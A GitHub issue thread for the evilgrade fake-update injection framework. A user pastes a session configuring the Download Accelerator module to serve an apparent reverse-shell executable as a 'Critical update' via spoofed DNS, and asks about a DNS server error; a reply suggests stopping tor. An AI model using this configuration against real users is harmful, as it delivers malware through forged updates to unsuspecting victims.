infobyte / evilgrade

Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates.
https://www.faradaysec.com/
1.28k stars 279 forks source link

error in initiating DNS SERVER #31

Open boss0608 opened 4 years ago

boss0608 commented 4 years ago

whenever i try to start evilgrade i always get this problem you can see that below i have pasted that and please help me resolving this problem evilgrade>show options

Display options:

.------------------------------------------------------------------------------------------------. | Name | Default | Description | +-------------+------------------------+---------------------------------------------------------+ | port | 80 | Webserver listening port | | debug | 1 | Debug mode | | DNSPort | 53 | Listen Name Server port | | DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) | | faraday | 0 | Enable RPC Faraday connection | | DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip ) | | RPCfaraday | http://127.0.0.1:9876/ | Faraday RPC Server | | sslport | 443 | Webserver SSL listening port | '-------------+------------------------+---------------------------------------------------------'

evilgrade>config dap evilgrade(dap)>set agent /var/www/html/evilleaks/rev_http_main.exe set agent, /var/www/html/evilleaks/rev_http_main.exe evilgrade(dap)>show options

Display options:

Name = Download Accelerator Version = 1.0 Author = ["Francisco Amato < famato +[AT]+ infobytesec.com>"] Description = "" VirtualHost = "(update.speedbit.com)"

.----------------------------------------------------------------------------------------------------------. | Name | Default | Description | +-------------+-------------------------------------------------+------------------------------------------+ | endsite | update.speedbit.com/updateok.html | Website display when finish update | | enable | 1 | Status | | description | This critical update fix internal vulnerability | Description display in the update | | title | Critical update | Title name display in the update | | failsite | www.speedbit.com/finishupdate.asp?noupdate=&R=0 | Website display when did't finish update | | agent | /var/www/html/evilleaks/rev_http_main.exe | Agent to inject | '-------------+-------------------------------------------------+------------------------------------------'

evilgrade(dap)>start evilgrade(dap)> [5/3/2020:13:36:13] - [WEBSERVER] - Webserver ready. Waiting for connections ...

evilgrade(dap)> [5/3/2020:13:36:13] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...

evilgrade(dap)>

Error: [DNSSERVER] - Error Initiating DNS Server

vulnbreave commented 2 years ago

Here your DNS server is already is running , most probably your tor service maybe . So , type this command

sudo service tor stop

Now try again .